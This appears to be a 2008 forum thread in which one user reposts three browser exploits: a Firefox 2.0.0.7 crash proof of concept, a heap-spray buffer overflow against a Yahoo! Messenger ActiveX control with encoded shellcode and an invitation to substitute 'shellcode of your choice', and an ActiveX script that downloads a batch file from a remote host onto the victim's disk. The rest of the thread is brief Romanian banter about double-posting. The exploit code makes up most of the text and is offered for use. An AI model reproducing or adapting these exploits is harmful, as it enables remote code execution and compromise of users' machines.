puskin Posted April 19, 2008 Report Share Posted April 19, 2008 i######################### ########################### AmnPardaz Security Research & Penetration Testing Group## Bug Title: Mozilla Firefox 2.0.0.7 Denial of Service# Vendor URL: [url]www.mozilla.org[/url]# Version: <= 2.0.0.7# Fix Available: Yes!# Soloution: Update to 2.0.0.8# Note: This bug works on 2.0.0.8 in different way. Although this bug doesn't crash 2.0.0.8, it causes not showing html code by viewing source in Mozilla Firefox 2.0.0.8 and this is another bug on 2.0.0.8!# Proof: [url]http://www.astalavista.ir/proofs/MozillaFireFox/DoS1.htm[/url]########################## [url]WwW.AmnPardaz.com[/url] ########################## Leaders : Shahin Ramezany & Sorush Dalili# Team Members: Amir Hossein Khonakdar, Hamid Farhadi# Security Site: [url]WwW.BugReport.ir[/url] - [url]WwW.AmnPardaz.Com[/url]# Country: Iran# Greetz To : Astalavista.ir (Secuiran.com) Security Research Group, GrayHatz.net# Contacts: <th3_vampire {4-t] yahoo [d-0-t} com> & <Irsdl {4-t] yahoo [d-0-t} com># ######################## Bug Description ############################# To do this work we need 2 files (Html,XML).# Their codes was written below.## Save below codes in a HTML file.#----------------------------------------------------------------------------------------------------------------------------------------<html> <head> <style>BODY{-moz-binding:url("moz.xml#xss")}</style> </head> <body> Suddenly see you baby! If you see this bug execution was failed! <script> alert('Soroush Dalili & Shahin Ramezani From Astalavista.ir') </script> </body></html>----------------------------------------------------------------------------------------------------------------------------------------## Save below codes in "moz.xml" file.#----------------------------------------------------------------------------------------------------------------------------------------<?xml version="1.0"?><bindings xmlns="http://www.mozilla.org/xbl"> <binding id="xss"> <implementation> <constructor><![CDATA[ eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%3e%27%29')); ]]></constructor> </implementation> </binding></bindings>----------------------------------------------------------------------------------------------------------------------------------------## Now by runnig the HTML file by Mozilla FireFox <= 2.0.0.7 it will be crashed and by Mozilla FireFox 2.0.0.8 no code will be showed by viewing the source.#################################################################### Quote Link to comment Share on other sites More sharing options...
puskin Posted April 19, 2008 Author Report Share Posted April 19, 2008 Yahoo! Messenger ywcupl.dll ActiveX Control send() Remote Buffer Overflow Exploit<html><!--45 minutes of fuzzing!Great results! very relible, runs calc.exe, replace with shellcode of your choice!!!link:[url]http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856[/url]maybe more vulz!Greetz to: str0ke and shinnai!--><html><object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277' id='target'></object><script>shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +"%uCC4A%uD0FF"); bigblock = unescape("%u9090%u9090"); headersize = 20; slackspace = headersize+shellcode.lengthwhile (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (x=0; x<800; x++) memory[x] = block + shellcode; var buffer = '\x0a'; while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a'; target.server = buffer; target.initialize(); target.send(); </script></html> Quote Link to comment Share on other sites More sharing options...
puskin Posted April 19, 2008 Author Report Share Posted April 19, 2008 Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Download<pre><code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">----------------------------------------------------------------------------- [b]Yahoo! Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download[/b] url: [url]http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe[/url] Author: shinnai mail: shinnai[at]autistici[dot]org site: [url]http://shinnai.altervista.org[/url] [b]<font color='red'>This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage.</font>[/b] Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 [b]Marked as: RegKey Safe for Script: False RegkeySafe for Init: False KillBitSet: False[/b] From remote: depends by Internet Explorer settings From local: yes [b]Description: This contron contains a "GetFile()" method which allows to download, on user's pc, an arbitrary file pased as argument. Remote execution depends by Internet Explorer settings, local execution works very well.[/b] [b]greetz to:<font color='red'> skyhole (or YAG KOHHA)</font> for inspiration[/b]-----------------------------------------------------------------------------<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object><input language=VBScript onclick=tryMe() type=button value='Click here to start the test'><script language='vbscript'> Sub tryMe test.GetFile "http://www.shinnai.altervista.org/shinnai.bat","c:\\shinnai.bat",5,1,"shinnai" MsgBox "Exploit completed" End Sub</script></span></span></code></pre> Quote Link to comment Share on other sites More sharing options...
Vhaerun Posted April 19, 2008 Report Share Posted April 19, 2008 cred ca ti-as strica toata distractia daca ti-as zice sa dai edit la post-ul tau de fiecare data cand vrei sa pui ceva aici , nu ?edit : a se inlocui cuvantul distractia cu "progresul spre V.I.P" ( sau RIP ) Quote Link to comment Share on other sites More sharing options...
puskin Posted April 19, 2008 Author Report Share Posted April 19, 2008 cred ca ti-as strica toata distractia daca ti-as zice sa dai edit la post-ul tau de fiecare data cand vrei sa pui ceva aici , nu ?edit : a se inlocui cuvantul distractia cu "progresul spre V.I.P" ( sau RIP )sorry man....ma cam luat valul..data viitoare nu o sa mai fac galagie ,numai bine! Quote Link to comment Share on other sites More sharing options...
Guest Kenpachi Posted April 19, 2008 Report Share Posted April 19, 2008 atunci cand sunt chestii utile pe mine nu ma deranjeaza double-triple sau X-ple posting. Quote Link to comment Share on other sites More sharing options...